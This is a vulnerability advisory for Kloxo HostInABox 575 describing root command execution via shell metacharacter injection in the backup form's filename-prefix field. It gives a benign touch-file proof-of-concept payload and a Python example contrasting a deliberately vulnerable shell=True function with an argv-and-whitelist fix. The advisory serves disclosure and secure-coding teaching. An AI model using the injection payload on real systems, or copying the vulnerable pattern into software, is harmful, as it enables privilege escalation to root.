Kloxo HostInABox 575 - shell invocation, local command execution as root



DESCRIPTION


Local users can execute any command(s) of their choice as root via shell metacharacter injection in the "Backup File Initial String" field of the backup form: the value is concatenated into a command line that Kloxo's root-privileged backend hands to a shell, so a ";" ends the intended command and whatever follows runs as root.



IMPACT


Local users can execute commands as root. To reproduce:

1. Log into Kloxo
2. Click "Backup Home"
3. In the box titled "Backup File Initial String", enter: ; /bin/touch /tmp/i_am_root ;
4. Click "Backup Now"

Observe:

[user1@testing574 user1]$ ls -l /tmp/i_am_root
-rw-r--r-- 1 root root 0 May 20 21:50 /tmp/i_am_root
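The following is an added example, not Kloxo's code, that models the bug in miniature: the "Backup File Initial String" value is spliced into a shell command line, so the payload from step 3 runs as a separate command. The same function pair then shows the fix a practitioner would want: pass the filename through an argv list (no shell parsing) and whitelist the characters a backup prefix may contain. `echo` stands in for the real tar invocation, and the `PREFIX_RE` pattern, `run_*` names and the harmless `echo INJECTED` payload are all assumptions made for the example.

```python
"""Added example (not Kloxo's code): shell metacharacter injection via a
backup filename prefix, and the hardened replacement.  'echo' stands in for
the tar command a real backup would run; paths and names are assumed."""
import re
import subprocess

# Constructed payload with the same shape as the advisory's
# "; /bin/touch /tmp/i_am_root ;", using a harmless echo instead of touch.
PAYLOAD = "; echo INJECTED ;"


def build_cmd_vulnerable(prefix: str) -> str:
    # The vulnerable pattern: untrusted text concatenated into a command
    # string that a root process later passes to /bin/sh -c.
    return f"echo creating backup {prefix}-home.tgz"


def run_vulnerable(prefix: str) -> str:
    # shell=True is exactly the sh -c step that makes ';' a separator.
    r = subprocess.run(build_cmd_vulnerable(prefix), shell=True,
                       capture_output=True, text=True)
    return r.stdout


def run_argv_literal(prefix: str) -> str:
    # Fix layer 1: an argv list is never parsed by a shell, so every
    # metacharacter in the prefix is just bytes inside one argument.
    argv = ["echo", "creating backup", f"{prefix}-home.tgz"]
    r = subprocess.run(argv, capture_output=True, text=True)
    return r.stdout


# Fix layer 2: a whitelist for what a backup prefix may look like (assumed).
PREFIX_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")


def validate_prefix(prefix: str) -> str:
    # Reject anything outside the whitelist before any command is built.
    if not PREFIX_RE.fullmatch(prefix):
        raise ValueError(f"rejected backup prefix: {prefix!r}")
    return prefix


def run_safe(prefix: str) -> str:
    # Both layers together: validated input, executed without a shell.
    return run_argv_literal(validate_prefix(prefix))


if __name__ == "__main__":
    print("vulnerable:", run_vulnerable(PAYLOAD))      # INJECTED runs
    print("argv only: ", run_argv_literal(PAYLOAD))    # payload is literal
    try:
        run_safe(PAYLOAD)
    except ValueError as e:
        print("validated: ", e)                        # payload rejected
```

In the vulnerable path the shell sees `echo creating backup ; echo INJECTED ; -home.tgz`, so the second command runs with the privileges of whatever process invoked the shell; in Kloxo's case that is root. The argv path prints the payload back verbatim because nothing ever interprets it, and the whitelist turns a suspicious value into a logged error instead of a silent filename.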